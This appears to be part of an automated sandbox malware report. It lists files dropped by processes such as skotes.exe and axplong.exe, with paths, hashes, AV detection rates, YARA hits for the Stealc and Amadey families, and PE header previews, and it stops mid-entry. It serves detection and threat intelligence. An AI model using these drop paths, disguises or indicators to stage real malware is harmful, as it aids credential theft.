Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22156802
Entropy (8bit):	1.6689135584385946
Encrypted:	false
SSDEEP:	49152:OZN6W2fQrQOVlMmtSUmUCAI/sysIDuEjj6fk2UucKP9dQb:c6WDRKLUCZ2UucKFm
MD5:	6D6BBF1E873FB791141EA7FE2C166DCF
SHA1:	BB43A4A6BCF531617BA95C4A9A18807322196F6F
SHA-256:	168AE0F09A9376003D735B592B46125DA5CC43D7E13CE7D9007328F76FB4AE8A
SHA-512:	B10059C3696FA4CC216CB54DCB2893453BC85F496372AA0F369A081ABE6632DFC2A1E8FB8BF37DB867FB8F71E0467B6E467B8A9A79A253DDB550491E22D7A2FC
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 48%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........;..................R......0.........8...@...........................D.......B...@..................................@<.L.....=......................P<..N....................................................8..............................text...h........................... ..`.rdata..............................@..@.data.........8..N...l8.............@....idata..L....@<.......9.............@....reloc...N...P<..P....9.............@..B.symtab.......=.......;................B.rsrc.........=.......;.............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3243008
Entropy (8bit):	6.650093644272246
Encrypted:	false
SSDEEP:	49152:ihw05uwGDAu9kS8AmainjRha/nxaIYd1s6l8ua3yflGAM:ovu9kS8AmainjLgn4LM6l8t3QLM
MD5:	D297F9F22080C6F66B4E9C9156A6FF86
SHA1:	BEF0F2E329D9DB6BAFE18B63482545B79B3D3C47
SHA-256:	D2A41394DA3C958EEECD0C43A72E5C401FD5209E462B0035BD1BA5DD9B4A6B46
SHA-512:	4FC5D9229C3174FB76947190458D56FF76133F286295AB4CE439E64DCC5DB5D0289C734EB4C7EE49DB7636CB2E9B22649009C7B7F920806D327710BF2618BB94
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.......1...@.................................W...k...........................Pl1..............................l1..................................................... . ............................@....rsrc...............................@....idata ............................@...bwzzahtg..........................@...rhjmaeag.....p1......V1.............@....taggant.0....1.."...Z1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2668544
Entropy (8bit):	6.1024828899386625
Encrypted:	false
SSDEEP:	49152:CAT1rDm9Jeg99E2spwr44UaaDB8v+oyLfwt3LE3eFqZHNZ25WYDo6fsWc6jlOaSo:CATNI9G2sOr44UaaDB8moVt3LE3eFqZw
MD5:	87330F1877C33A5A6203C49075223B16
SHA1:	55B64EE8B2D1302581AB1978E9588191E4E62F81
SHA-256:	98F2344ED45FF0464769E5B006BF0E831DC3834F0534A23339BB703E50DB17E0
SHA-512:	7C747D3EDB04E4E71DCE7EFA33F5944A191896574FEE5227316739A83D423936A523DF12F925EE9B460CCE23B49271F549C1EE5D77B50A7D7C6E3F31BA120C8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 48%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.Gra.)!a.)!a.)!.** l.)!., ..)!.- r.)!p-* s.)!p-- q.)!p-, G.)!.( d.)!a.(!?.)!.-! `.)!.-.!`.)!.-+ `.)!Richa.)!................PE..L.....eg.................&.........P.#.......&...@...........................).......(...@...................................'.<.....'.}.....................(..j....'.T...........................@.'.@.............&.@............................text.....&.......&................. ..`.rdata..,.....&.......&.............@..@.data.........'.......'.............@....fptable......'.......'.............@....rsrc...}.....'.......'.............@..@.reloc...j....(..l...L(.............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2997760
Entropy (8bit):	6.551389179332118
Encrypted:	false
SSDEEP:	24576:iLrBn00q7pq7QKLT7tGAyhypbF0aNvGxBXrLrTYcXyvoMCLhCMUSUmyeXPIJ1D/7:iLdn8sRjli3AOygMCVCxmRXPGrBrA
MD5:	27E0A573048FADB3DD4B3B2454C8EDA5
SHA1:	C841C7FD14F4982E37AED56B25C0D748902FA9E2
SHA-256:	6D6884E9912854C20C4DEA409280402B3E27A0448407AD7F37C3FB642EE60525
SHA-512:	AB59C135D12624748A9C1275D99D65CF479A96A3D6C3A9BE948AF2C160EBC703B632CF923C9CB6C62CDE8029D57DDBBDE6AFFC2A12FA0FE4D8CFE91A8A6C2FFB
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................0...........@...........................0......X....@.................................Y@..m............................A...................................................................................... . . .......d..................@....rsrc .....0.......t..............@....idata .....@.......t..............@...xkuacxgz.0+..P..."+..v..............@...pzmqirjh......0.......-.............@....taggant.0....0.."....-.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[5].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4472320
Entropy (8bit):	7.98532948304534
Encrypted:	false
SSDEEP:	98304:vAx5/WplbQ6CxuaEWu9jz4ymioFziUAnVJGt:YxojbQ6zaEWGjk9ioFfQJG
MD5:	46F2CE87FF70ECD81CEF884655F82EA3
SHA1:	B236341BE179023437F850DF56B27DAC08BB1A05
SHA-256:	B187942302ACFC0C1ED1390B5554950F9A8DA7FC6EF53F93B78DE85CA0816E49
SHA-512:	52037FFAC32B792F86810B84A7F6F1939C7E2720C602D84675BEF0F5E3D927A58304C50B883A7207ED2910C12A91E320865ED72AB3A850B5FC468F2A1104FDD7
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2...`....... I...@..................................kD...@... ............................._.m.s.....m...............p......E..............................\E...................................................... . ..m.......(.................@....rsrc.........m.......(.............@....idata ......m.......(.............@... ..8...m.......(.............@...jbmcqnop........x....(.............@...sxtwdxzr.....P........D.............@....taggant.0...`..."....D.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UfEglUg[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	512512
Entropy (8bit):	7.656506729602759
Encrypted:	false
SSDEEP:	12288:KZqOSYt4cgd2+H+vX8otxBVOm79J9T5mO26aKCKRdj:KsOSKgx48cbt526MKHj
MD5:	1C21807FE5D68CDBE4B25DB1F98D0178
SHA1:	4433FA96D7EA5F5F350C1D0E2DCC1193FB0A537B
SHA-256:	EE568D0EAFBA58939DF020D8E1B20BAFC58DD27A3BA251EDF5F2910826D61362
SHA-512:	DB8AF483799A9A4F900575EA7E9C87676A4594B471FDA9AA78DC30D3C246EC33F7B76BA3B37D8B034143499B94F0C6112256635CA97B426328CB03FDFC7E0527
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....kg.........."......:.......................@.......................... ............@.....................................<....0.......................@..............................(........_..................p............................text....8.......:.................. ..`.rdata......P.......@..............@..@.data...T'..........................@....tls......... ......................@....rsrc........0......................@..@.reloc.......@......................@..B.bss.........`......................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.383901343696073
Encrypted:	false
SSDEEP:	48:SfNaoQVTEQRfNaoQ6NuNYQ6NLfNaoQaEQyfNaoQpm0UrU0U8QU:6NnQVTEQtNnQ6NuNYQ6NjNnQaEQaNnQg
MD5:	76BD2E8D850F564903CB865140954129
SHA1:	1E9177BCCF4E6C0110C629B419A9D44ACD431ACF
SHA-256:	3E902385ABA152841796D312A3DDB45D656E89F5858D422D4E86BB5C6ECEBDF1
SHA-512:	F77A3A7B287ABB29F6E9A5684B0CE46309C479DCABA98E140E03765A07273FB54C522CEF9CC10FAA412F143C1D88EBFF4E07EC3CD25733E1C83B3D8911EC7B4E
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/8C52939DDF966343F83FA30BED18C0BF",.. "id": "8C52939DDF966343F83FA30BED18C0BF",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/8C52939DDF966343F83FA30BED18C0BF"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/7426665F3D888B77E2813A818CACED38",.. "id": "7426665F3D888B77E2813A818CACED38",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/7426665F3D888B77E2813A818CACED38"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k0ukcEH[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1885696
Entropy (8bit):	7.948069201610694
Encrypted:	false
SSDEEP:	49152:T6LdQJvCGy4qv8bM30XtiihD/g6UWCQf8kq2ht:T6Ls6avbMkdiiZgeP8m
MD5:	4EAE4944D789D3440760E32531707AD7
SHA1:	9875755EA86CB649E1A9375CC83D3645AB83B493
SHA-256:	52CA4ACAE645D61221E7859F08EF4295F838C0A0DF9A796B7F02B584CBABCBA1
SHA-512:	E9D999AA55C95EDFBE00F20F52B2D567130BB9B8E3783A8A3C1E849C7CB70BC6AA8D13707671B2AB1F7F89D55AF8F3BD3D5BE3FF8CDE5743FAFBC5E07BE0B276
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................@J...........@..........................pJ...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...dqaezxce.@..../..@...^..............@...znjwjjbm.....0J.....................@....taggant.0...@J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	540672
Entropy (8bit):	7.614709628313703
Encrypted:	false
SSDEEP:	12288:huB9du8NOZx84E5YoShCwrp1OkwWFewdYHMUzN4r52ki:i9du88Zx8VAwBkewVUckki
MD5:	9AB250B0DC1D156E2D123D277EB4D132
SHA1:	3B434FF78208C10F570DFE686455FD3094F3DD48
SHA-256:	49BFA0B1C3553208E59B6B881A58C94BB4AA3D09E51C3F510F207B7B24675864
SHA-512:	A30FB204B556B0DECD7FAB56A44E62356C7102BC8146B2DFD88E6545DEA7574E043A3254035B7514EE0C686A726B8F5BA99BCD91E8C2C7F39C105E2724080EF0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...WZig..........".................R.............@.......................................@.................................dH..<...............................p....................................................J..l............................text...+........................... ..`.rdata..\|...........................@..@.data....%...`.......J..............@....tls.................`..............@....reloc..p............b..............@..B.bss................................@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	504832
Entropy (8bit):	7.648125897370556
Encrypted:	false
SSDEEP:	12288:2ZqOSYt4cgd2+kybsmwawsMHkmeuTtFRsssTzTgfbecS0aN:2sOSKgx75TZYk1Am8fq/0e
MD5:	EDDFECE1B9A053D57735A6FA7A3C7EF8
SHA1:	3D33114DB94B9EE861CE361B30C6EBF09D212B46
SHA-256:	7B1C74BECEDC4D836C2B362D300E43DCCE639D2B6F5949D0A3F43B1D790AFC68
SHA-512:	03701259D5D1C76F60CB14481A97424207564C7C514AB6E4A74D8B682C0D2CB739AB70B52FF5A14BE98D329CA5BFA571F5660EC7B9CDBC77F32C8EBCBD4423C7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 35%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....kg.........."......:.......................@.......................................@.....................................<....0.......................@..............................(........_..................p............................text....8.......:.................. ..`.rdata......P.......@..............@..@.data...T'..........................@....tls......... ......................@....rsrc........0......................@..@.reloc.......@......................@..B.bss.........`......................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[3].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5169664
Entropy (8bit):	5.544955031845111
Encrypted:	false
SSDEEP:	24576:hcdSpdXoWs2ps+xunxcADxJN26yU5fd7Kp3fL1AbtY1W2Pb1eDMcPOwEmyrbvpyL:aWRs+hADNj7KD1V+5WFEfxVzT1wG3
MD5:	97B80E7A522A3D40515E954A1FB4B428
SHA1:	A08336FCD36B3FEC4EFD009375C57F4E7FA452E7
SHA-256:	594242F39E0A43970C2C6B459BAADE07C3CDC8DF4DCADF89AD6166DC12D5F16C
SHA-512:	3C58D0092977242A386107E0D74E376DE0131523B139E09BA93D5604637AF22017C0EC2359C42D1837F775137432EFEBD898102CE3DC22E66EDB45A5F527A204
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........N...........@.......................... O......(O...@.................................M.$.a.....$.......................$..................................................................................... . ..$.......$.................@....rsrc.........$.......$.............@....idata ......$.......$.............@...hsfspruu. ...$......$.............@...ilcadzlg......N.......N.............@....taggant.0....N.."....N.............@...........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[4].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1885696
Entropy (8bit):	7.948069201610694
Encrypted:	false
SSDEEP:	49152:T6LdQJvCGy4qv8bM30XtiihD/g6UWCQf8kq2ht:T6Ls6avbMkdiiZgeP8m
MD5:	4EAE4944D789D3440760E32531707AD7
SHA1:	9875755EA86CB649E1A9375CC83D3645AB83B493
SHA-256:	52CA4ACAE645D61221E7859F08EF4295F838C0A0DF9A796B7F02B584CBABCBA1
SHA-512:	E9D999AA55C95EDFBE00F20F52B2D567130BB9B8E3783A8A3C1E849C7CB70BC6AA8D13707671B2AB1F7F89D55AF8F3BD3D5BE3FF8CDE5743FAFBC5E07BE0B276
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................@J...........@..........................pJ...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...dqaezxce.@..../..@...^..............@...znjwjjbm.....0J.....................@....taggant.0...@J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_valenciga[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245760
Entropy (8bit):	6.574504597316098
Encrypted:	false
SSDEEP:	3072:skv0eu6ZJlctXwLISyqlsxfKPkAck1gD1l567pGDUJ42pUvp85lmv6RReHeP3Kqc:/MeNRFLIu5ckeHgFGD+jpUvwzzeot+
MD5:	89AD45B4A0E2D547C1E09D0A1EA94DF6
SHA1:	CA32C2E492BB6D0753AAB59993380DB79B080740
SHA-256:	18F4E82898557BA7F23F5B58E181793AEE6B9EE066258CE0B8FDBA63A714C4F8
SHA-512:	22C575D47780046D845E0C383BF02ADED47D2813173EA6F07180F8726BE42084336EF5009C34C5C8295D0DEDDB3F19F6E5FEE1902D62AC9499A117E7DE59C4FF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_valenciga[1].exe, Author: Joe Security Rule: infostealer_win_stealc_str_oct24, Description: Finds Stealc standalone samples (or dumps) based on the strings, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_valenciga[1].exe, Author: Sekoia.io
Antivirus:	Antivirus: ReversingLabs, Detection: 91%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L.....jg.....................F"...................@...........................%...........@.................................Lf..<.............................$.\|<...................................................................................text............................... ..`.rdata..............................@..@.data....+!..p.......V..............@....reloc...]....$..^...b..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\am209[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	439808
Entropy (8bit):	6.48944055080441
Encrypted:	false
SSDEEP:	6144:as9C0eaieHm71o2pL2IMJDoMc2ZNu5GQpsnp/yFPMsXnQODVNIg+cTtgJ7AO+Zj5:as9C0eaieHmO292D3//yFPMsXkJ7gmk
MD5:	CE27255F0EF33CE6304E54D171E6547C
SHA1:	E594C6743D869C852BF7A09E7FE8103B25949B6E
SHA-256:	82C683A7F6E0B4A99A6D3AB519D539A3B0651953C7A71F5309B9D08E4DAA7C3C
SHA-512:	96CFAFBAB9138517532621D0B5F3D4A529806CFDF6191C589E6FB6EBF471E9DF0777FB74E9ABBFE4E8CD8821944AD02B1F09775195E190EE8CA5D3FD151D20D9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\am209[1].exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L...Q.-g.........................................@..........................0............@.................................@E...................................E......8...............................@...............<............................text............................... ..`.rdata..PH.......J..................@..@.data....m...`...,...B..............@....rsrc................n..............@..@.reloc...E.......F...p..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\hmUaBuJ[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	163840
Entropy (8bit):	6.566613042756068
Encrypted:	false
SSDEEP:	3072:tC3B69W7vRW9zrAA4DhYYBP4gPgjZNLT90QLX+syUnvQT4:tCTZq54SYt4cgdV50i+ZgYT4
MD5:	F68BE1454F7E19BC9126A95FF672DD50
SHA1:	2861E688DA0C666BDC2958BD40D9FE42B05346F4
SHA-256:	406075BB9D6ECB653F14E067E261B7BEC53FACB513FFB6A128B3FE3E437D5093
SHA-512:	EC250115B686A8D8EA14E3551F9CF43C2C17A42ED79EBC99A77F0579455ED72BBC2314D58340BBBEBB83B1CB66BB189D8AA1168D1B6555A81AAB5B8E5B05E742
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....kg.........."......:.......................@.......................................@.....................................<....0.......................@..............................(........_..................p............................text....8.......:.................. ..`.rdata......P.......@..............@..@.data...T'..........................@....tls......... ......................@....rsrc........0......................@..@.reloc.......@......................@..B.bss.........`......................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\projectspecificpro[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2289152
Entropy (8bit):	7.97649882402698
Encrypted:	false
SSDEEP:	49152:QDcmqGIEZdPBXTyCQlyjbuM1Pw/PgvpYpTnwhNiIsHdeKmZxs+Ic:87qG9Zd5jOly+PgvOZwlsHdeFazc
MD5:	8BD7094AB0AF0CD3F4684F8486357555
SHA1:	D60A38EB7D428BB931455174BDC2CBE5535414A2
SHA-256:	8DD69B6E9FA1C38E93A68DACBA5C85E5BC6C11F8B7F25C22140C0BE4A8A4FE48
SHA-512:	0ADF15C098E724FA3EB73622318171B393EB8244389212682D5369142C14A9C1D8635BB848F84E04033F36436AC0C2766411597C88A5547E7C389D780F343C99
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 57%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6..7...6..7...6..7...6..7...6...6...6..7...6..o6...6..7...6Rich...6................PE..d................."......\|...n"................@.............................@#.......#...`.......... ......................................<............="..................0#. .......T...........................................(... ............................text....{.......\|.................. ..`.rdata...".......$..................@..@.data...............................@....pdata..............................@..@.rsrc....@"......>".................@..@.reloc.. ....0#.......".............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1901056
Entropy (8bit):	7.950394200392934
Encrypted:	false
SSDEEP:	24576:9lfqjWT5m2YWMD4qLz98KnZysYo4WjTXJXNbk517KKhK1xUzb/D9Yqn3rFet:9lrg2YkouKIynTvI519g1+J0
MD5:	3FA3842503DB7F65438CDDE8B7A7DD0F
SHA1:	A0BD7985356D95815D48319D09D4CC6563F1D79A
SHA-256:	5FA5BA975EC4C3D2EC2F47A7B4E528DFD23CF4F6636610E0A393CB648661003F
SHA-512:	5F1E36269AB77E4D2B848ACC40FF14BE93027272DBCEB4CE8348638CF5DE19716BE4B6CDE01CAEADE55A4C5555ADE559DF8BEBFF0FD49C0ADB0FC858AEC24096
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................@K...........@..........................pK...........@.................................W...k...........................t!K.............................$!K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...csnwaitg.....@1.....................@...civfgwbo.....0K.....................@....taggant.0...@K.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2282496
Entropy (8bit):	7.977141663846527
Encrypted:	false
SSDEEP:	49152:zbhNKaAGXnfj1V5GqSGIK7+yo22YdBwxpLwzvysDxeAPY01Y:/bHdGqCKSKdBwPUBDhw01Y
MD5:	71B104246AC3F43D058E7C67E8B07DEF
SHA1:	9CA447F8443A95DC7BFAF082AE88DB7C338CB580
SHA-256:	2EF46EDD099D06C685F70182337F9F0E1A8DD36B2977509EB5A309582F72E9C8
SHA-512:	4C58B1B89FFD82BEF5249ABE87506A0FB904384C239798D70EA4F5D5745168E143F0FD9340C52D526E997196DA4315906CEEDFAE8A923BDE26CC502C73B5BE3E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 57%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6..7...6..7...6..7...6..7...6...6...6..7...6..o6...6..7...6Rich...6................PE..d................."......\|...T"................@.............................0#.....T.#...`.......... ......................................<............"".................. #. .......T...........................................(... ............................text....{.......\|.................. ..`.rdata...".......$..................@..@.data...............................@....pdata..............................@..@.rsrc....0"......$".................@..@.reloc.. .... #.......".............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[3].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
